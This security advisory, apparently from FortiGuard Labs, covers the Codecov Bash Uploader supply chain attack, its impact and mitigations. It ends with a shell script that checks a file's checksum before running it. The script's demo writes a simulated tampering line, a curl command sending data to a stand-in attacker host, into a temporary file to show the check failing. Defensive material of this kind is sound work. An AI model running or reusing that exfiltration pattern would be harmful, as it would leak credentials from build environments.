Codecov Supply Chain Attack Affecting Organizations Worldwide

Description

FortiGuard Labs is aware of reports of a supply chain attack on Codecov, a software auditing company. Codecov is a code analysis tool that helps developers audit their code within an organization. The attack occurred when an unnamed threat actor was able to access and modify the Codecov Bash Uploader script. According to Codecov, the attacker leveraged a vulnerability in Codecov's Docker image creation process to steal a credential, which in turn allowed the attacker to modify the script.


According to Codecov, the first observed activity started around January 31, 2021, when sporadic instances of the modified Bash Uploader script were seen exfiltrating data stored in customers' continuous integration environments. The exfiltrated data was sent to a remote server controlled by the attacker.


How Widespread is this Attack?

Global. According to various sources, as many as 29,000 organizations worldwide are impacted because they either use Codecov directly or use products that depend on it.


What is the Scope of Impact of this Issue?

According to Codecov:


- Any credentials, tokens, or keys that our customers were passing through their CI runner that would be accessible when the Bash Uploader script was executed.
- Any services, datastores, and application code that could be accessed with these credentials, tokens, or keys.
- The git remote information (URL of the origin repository) of repositories using the Bash Uploaders to upload coverage to Codecov in CI.


How Serious of an Issue is This?

HIGH.


Is there Any Identified Nation State Activity or Attribution?

No. There have been no known reports identifying the threat actors behind this supply chain attack.


What is the status of Protections?

FortiGuard Labs has the following (AV) signature in place for publicly available samples:


BASH/Agent.AK!tr


All network IOCs are blocked by the Web Filtering client.


Any Other Suggested Mitigation?

It is suggested that any and all file downloads, even from a trusted source, be checked against the vendor-provided checksum before use. If the computed hash does not match the value published by the vendor, it is suggested to either download the file again or stop and notify the vendor of the discrepancy. For further details and vendor-specific suggestions, please refer to the Bash Uploader Security Update in the APPENDIX.
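The checksum check described above, as an added example that is not FortiGuard's or Codecov's own code: a POSIX shell helper that computes the SHA-256 of a downloaded script, compares it to the vendor-published digest, and refuses to proceed on mismatch. The demo at the bottom uses a constructed sample file and its known digest in place of a real uploader and a real published checksum.

```shell
#!/bin/sh
# Added example: verify a downloaded script against a vendor-published
# SHA-256 digest before it is ever executed. Fails closed on mismatch.

# sha256_of FILE -> prints the lowercase hex SHA-256 digest of FILE.
# Falls back to shasum on systems (e.g. macOS) without sha256sum.
sha256_of() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | awk '{print $1}' | tr 'A-F' 'a-f'
    else
        shasum -a 256 "$1" | awk '{print $1}' | tr 'A-F' 'a-f'
    fi
}

# verify_checksum FILE EXPECTED_HEX
# Returns 0 when FILE's digest equals the published value, 1 otherwise.
# The expected value is normalised to lowercase so case differences in
# the vendor's checksum list do not cause spurious failures.
verify_checksum() {
    _file="$1"
    _expected=$(printf '%s' "$2" | tr 'A-F' 'a-f')
    _actual=$(sha256_of "$_file")
    if [ "$_actual" = "$_expected" ]; then
        return 0
    fi
    echo "checksum mismatch for $_file: expected $_expected, got $_actual" >&2
    return 1
}

# run_verified FILE EXPECTED_HEX -> runs FILE only if verification passes.
# This is the gate to put between "download uploader" and "execute it".
run_verified() {
    verify_checksum "$1" "$2" || return 1
    sh "$1"
}

# Constructed demo: the "published" digest below is SHA-256 of "hello\n",
# standing in for the vendor's checksum of a real uploader script.
DEMO_DIGEST=5891b5b522d5df086d0ff0b110fbd9d21bb4fc7163af34d08286a2e846f6be03
demo_file=$(mktemp)
printf 'hello\n' > "$demo_file"
verify_checksum "$demo_file" "$DEMO_DIGEST" && echo "untampered: OK"
printf 'curl -d @- https://attacker.invalid\n' >> "$demo_file"   # simulated tampering
verify_checksum "$demo_file" "$DEMO_DIGEST" || echo "tampered: refused"
rm -f "$demo_file"
```

In a real pipeline, `run_verified` replaces any `curl ... | bash` step, with EXPECTED_HEX taken from the vendor's published checksum list rather than from the same host that served the script.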